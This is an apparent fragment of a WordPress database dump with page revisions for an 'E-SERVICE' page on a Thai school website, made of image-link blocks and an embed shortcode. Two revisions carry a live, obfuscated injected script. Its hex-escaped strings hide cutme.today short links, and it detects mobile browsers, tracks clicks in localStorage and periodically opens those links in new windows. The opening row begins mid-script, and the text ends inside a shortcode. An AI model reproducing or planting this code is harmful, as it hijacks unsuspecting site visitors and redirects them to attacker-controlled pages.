_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2025-07-03 11:46:58','2025-07-03 04:46:58','',459,'http://pakhaeng.ssk.in.th/?p=1649',0,'revision','',0),
(1650,1,'2025-07-03 11:46:59','2025-07-03 04:46:59','<!-- wp:image {\"id\":1620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\" class=\"wp-image-1620\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" class=\"wp-image-1614\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:image {\"id\":1638,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ๆฟ-1024x256.png\" alt=\"\" class=\"wp-image-1638\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2025-07-03 11:46:59','2025-07-03 04:46:59','',459,'http://pakhaeng.ssk.in.th/?p=1650',0,'revision','',0),
(1651,1,'2025-07-03 11:46:59','2025-07-03 04:46:59','<!-- wp:image {\"id\":1620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\"/></figure>\n<!-- /wp:image -->\n<!-- wp:columns -->\n<!-- wp:column -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n<!-- /wp:column -->\n<!-- wp:column -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:column -->\n<!-- wp:column -->\n<!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n<!-- /wp:column -->\n<!-- /wp:columns -->\n<!-- wp:image {\"id\":1638,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ๆฟ-1024x256.png\" alt=\"\"/></figure>\n<!-- /wp:image -->\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<p></p>\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->[embedpress embedpress_embeded_link=\'https://www.canva.com/design/DAGsFHWqrOk/eCZISZCLZjZV8cpVDnNIUA/view\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' 